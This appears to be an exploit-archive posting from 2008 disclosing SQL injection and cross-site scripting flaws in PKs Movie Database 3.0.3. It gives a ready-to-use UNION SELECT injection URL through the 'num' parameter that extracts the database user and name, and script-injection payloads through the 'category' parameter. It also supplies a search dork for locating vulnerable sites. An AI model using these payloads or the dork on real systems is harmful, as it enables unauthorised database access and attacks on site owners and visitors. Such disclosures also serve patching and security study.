[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PKs Movie Database 3.0.3 XSS / SQL Injection Vulnerabilities
# Published : 2008-02-10
# Author : Houssamix
# Previous Title : AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit
# Next Title : ITechBids 6.0 (detail.php item_id) SQL Injection Vulnerability
-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------
= Author : HouSSaMix From H-T Team
= Script : PKs Movie Database version 3.0.3
= Original advisory : http://www.securityfocus.com/bid/27713/
= BUG 1 : Remote SQL Injection Vulnerability
exploit => www.target.com/path/index.php?num=-1%20union%20select%201,2,3,4,5,6,user(),database(),9,10,11,12,13,14,15,16,17,18,19,20
= BUG 2 : XSS
exploit => www.target.com/path/index.php?category=[XSS]
www.target.com/path/index.php?num=9999999999&category=[XSS]
example : www.target.com/path/index.php?category=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
www.target.com/path/index.php?num=9999999999&category=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
= Dork : "PKs Movie Database"
# www.Syue.com [2008-02-10]